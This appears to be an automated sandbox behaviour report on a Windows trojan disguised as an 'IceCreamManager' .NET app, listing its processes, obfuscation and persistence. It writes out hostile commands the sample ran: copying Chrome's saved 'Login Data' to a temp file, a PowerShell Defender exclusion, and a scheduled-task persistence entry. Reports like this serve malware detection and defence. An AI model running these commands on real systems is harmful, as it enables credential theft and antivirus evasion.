          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeFile created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeJump to behavior
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeFile created: C:\Users\user\AppData\Local\Temp\tmp280F.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/9@7/6
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01
          Source: iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2017 JIYUKOBO Ltd. All Rights Reserved.slnt
          Source: iuvRyl9i7D.exeString found in binary or memory: BatchTabLayout#tableLayoutPanel4+ProcessEndOfDayButton!!ProcessEndOfDay1LoadTruckRouteFileButton'!LoadTruckRouteFile3LoadTruckDriverFileButton)!LoadTruckDriverFileOLoadOverallInventoryExtensionFileButtonE!LoadOverallInventoryExtensionFile=LoadOverallInventoryFileButton3!LoadOverallInventoryFile9LoadTruckInventoryFileButton/!LoadTruckInventoryFile/LoadTruckFuelFileButton%!LoadTruckFuelFile'LoadTruckFileButton
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: iuvRyl9i7D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: iuvRyl9i7D.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: iuvRyl9i7D.exe, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: dDqpEdJEtzi.exe.0.dr, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 8.2.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 8.0.iuvRyl9i7D.exe.2f0000.1.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 8.0.iuvRyl9i7D.exe.2f0000.2.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 8.0.iuvRyl9i7D.exe.2f0000.3.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 8.0.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 12.0.iuvRyl9i7D.exe.590000.9.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 12.0.iuvRyl9i7D.exe.590000.2.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 12.0.iuvRyl9i7D.exe.590000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 12.2.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 12.0.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 12.0.iuvRyl9i7D.exe.590000.5.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: iuvRyl9i7D.exe, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: dDqpEdJEtzi.exe.0.dr, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 0.0.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 0.2.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 8.2.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 8.0.iuvRyl9i7D.exe.2f0000.1.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 8.0.iuvRyl9i7D.exe.2f0000.2.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 8.0.iuvRyl9i7D.exe.2f0000.3.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 8.0.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 12.0.iuvRyl9i7D.exe.590000.9.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 12.0.iuvRyl9i7D.exe.590000.2.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 12.0.iuvRyl9i7D.exe.590000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 12.2.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 12.0.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 12.0.iuvRyl9i7D.exe.590000.5.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00409023 push esi; iretd
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00416B91 push edx; retf
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00417423 push es; retf
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041D672 push eax; ret
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041D67B push eax; ret
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041D625 push eax; ret
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041D6DC push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0463D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00609023 push esi; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00616B91 push edx; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00617423 push es; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061D672 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061D67B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061D625 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061D6DC push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63421102824
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63421102824
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeFile created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
